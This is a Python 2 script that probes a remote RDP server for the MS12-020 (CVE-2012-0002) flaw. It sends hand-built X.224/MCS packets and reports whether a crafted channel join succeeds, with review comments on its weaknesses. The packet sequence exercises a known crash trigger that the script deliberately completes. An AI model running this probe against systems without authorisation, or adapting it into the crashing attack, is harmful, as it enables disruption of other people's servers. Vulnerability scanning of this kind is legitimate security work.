MS12-020/CVE-2012-0002 Vulnerability Tester
#!/usr/bin/env python
"""
MS12-020/CVE-2012-0002 Vulnerability Tester
based on sleepya's version @ http://pastebin.com/Ks2PhKb4
"""
import socket
import struct
import sys
from binascii import hexlify, unhexlify
def exploit(host, port):
  """Probe one RDP endpoint for MS12-020 (CVE-2012-0002) and print the verdict.

  The exchange is strictly sequential: X.224 Connection Request, MCS
  Connect-Initial, two Attach User requests, then a Channel Join whose reply
  decides the verdict, followed (only on the vulnerable path) by a second
  Channel Join that completes the request.  That sequence on the RDP port is
  the observable fingerprint of this probe.

  Args:
    host: hostname or IPv4 address of the RDP server (AF_INET socket).
    port: TCP port of the RDP service (normally 3389; taken from argv by the
      caller, no validation here).

  Raises:
    SystemExit(1): when the first reply is not one of the two recognised
      Connection Confirm forms.
    socket.error / socket.timeout: every send/recv below is unguarded; the
      10-second timeout applies to connect and to each call.
    ValueError: from int() if the second Attach User reply is shorter than
      11 bytes (hexlify of an empty slice gives '').

  Python 2 only: uses the print statement and compares str slices against
  raw byte literals.

  NOTE(review): a timeout or reset between the first Channel Join request
  and the completing request below means the completing request is never
  sent, because no exception handling exists on that path.
  """
  # See http://msdn.microsoft.com/en-us/library/cc240836%28v=prot.10%29.aspx
  # X.224 Connection Request carrying an RDP Negotiation Request; the
  # per-field layout is in the inline comments.
  connection_request = unhexlify(''.join([
    "0300", # TPKT Header version 03, reserved 0
    "0013", # Length
    "0e", # X.224 Data TPDU length
    "e0", # X.224 Type (Connection request)
    "0000", # dst reference
    "0000", # src reference
    "00", # class and options
    "01", # RDP Negotiation Message
    "00", # flags
    "0800", # RDP Negotiation Request Length
    "00000000" # RDP Negotiation Request
  ]))
  # MCS Connect-Initial with three domain-parameter sets (target/min/max).
  # Each "02 01 xx" / "02 02 xxxx" item is a DER INTEGER; the "30 xx" bytes
  # open a SEQUENCE of the stated size.
  initial_pdu = unhexlify(''.join([
    "03000065", # TPKT Header
    "02f080", # Data TPDU, EOT
    "7f655b", # Connect-Initial
    "040101", # callingDomainSelector
    "040101", # calledDomainSelector
    "0101ff", # upwardFlag
    "3019", # targetParams + size (25 bytes)
    "020122", # maxChannelIds
    "020120", # maxUserIds
    "020100", # maxTokenIds
    "020101", # numPriorities
    "020100", # minThroughput
    "020101", # maxHeight
    "0202ffff", # maxMCSPDUSize
    "020102", # protocolVersion
    "3018", # minParams + size (24 bytes)
    "020101", # maxChannelIds
    "020101", # maxUserIds
    "020101", # maxTokenIds
    "020101", # numPriorities
    "020100", # minThroughput
    "020101", # maxHeight
    "0201ff", # maxMCSPDUSize
    "020102", # protocolVersion
    "3019", # maxParams + size (25 bytes)
    "0201ff", # maxChannelIds
    "0201ff", # maxUserIds
    "0201ff", # maxTokenIds
    "020101", # numPriorities
    "020100", # minThroughput
    "020101", # maxHeight
    "0202ffff", # maxMCSPDUSize
    "020102", # protocolVersion
    "0400", # userData
  ]))
  # MCS Attach User Request (PER encoded); sent twice below to obtain two
  # user ids.
  user_request = unhexlify(''.join([
    "0300", # header
    "0008", # length
    "02f080", # X.224 Data TPDU (2 bytes: 0xf0 = Data TPDU, 0x80 = EOT)
    "28", # PER encoded PDU contents
  ]))
  # Channel Join Request prefix; the two user/channel ids are appended later.
  channel_join_request = unhexlify("0300000c02f08038")
  skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  skt.settimeout(10) # covers connect() and every send()/recv() below
  skt.connect((host, port))
  # NOTE(review): socket.send() may deliver fewer bytes than given; sendall()
  # is the call that guarantees the whole buffer goes out.  Same for every
  # send() below.
  skt.send(connection_request)
  data = skt.recv(8192)
  # Accept either known Connection Confirm reply (0xd0 is the X.224
  # Connection Confirm code); anything else is treated as "not RDP".
  # NOTE(review): skt is not closed on this exit path -- close() is only
  # reached at the end of the function.
  if data != unhexlify("0300000b06d00000123400") \
  and data != unhexlify("030000130ed000001234000201080000000000"):
    print "ERROR: This isn't RDP"
    raise SystemExit(1)
  skt.send(initial_pdu)
  # Send attach user request
  skt.send(user_request)
  data = skt.recv(8192)
  # Two-byte id from the first Attach User Confirm.  No length check: a short
  # reply silently yields a shorter slice.
  user1 = data[9:11]
  # Send another attach user request
  skt.send(user_request)
  data = skt.recv(8192)
  # Second id as a big-endian integer; int('') raises ValueError if the reply
  # is too short.
  user2_int = int(hexlify(data[9:11]), base=16)
  # Presumably the channel id derived from the second user id (MCS user
  # channels start at 1001) -- confirm against MS-RDPBCGR.
  user2 = struct.pack('!H', user2_int + 1001)
  # Send channel join request
  skt.send(channel_join_request + user1 + user2)
  data = skt.recv(8192)
  if data[7:9] == "\x3e\x00":
    """ 0x3e00 indicates a successful join; this service is vulnerable """
    print "This device is vulnerable"
    # Complete request to prevent BSOD
    skt.send(channel_join_request + struct.pack('!H', user2_int) + user2)
    # Reply is read to finish the exchange but not inspected.
    data = skt.recv(8192)
  else:
    # Patched
    # NOTE(review): this branch is also reached when data is empty or shorter
    # than 9 bytes (closed connection, truncated reply), so this message can
    # be a false negative.
    print "This device is not vulnerable to MS12-020."
  skt.close()
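if __name__ == '__main__':
  # Usage: <host> <port>.  Report missing arguments instead of dying with an
  # IndexError; extra arguments are still ignored and a non-numeric port still
  # raises ValueError from int(), as before.
  if len(sys.argv) < 3:
    sys.stderr.write("usage: %s <host> <port>\n" % sys.argv[0])
    raise SystemExit(2)
  exploit(sys.argv[1], int(sys.argv[2]))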
# vim: set expandtab ts=2 sw=2: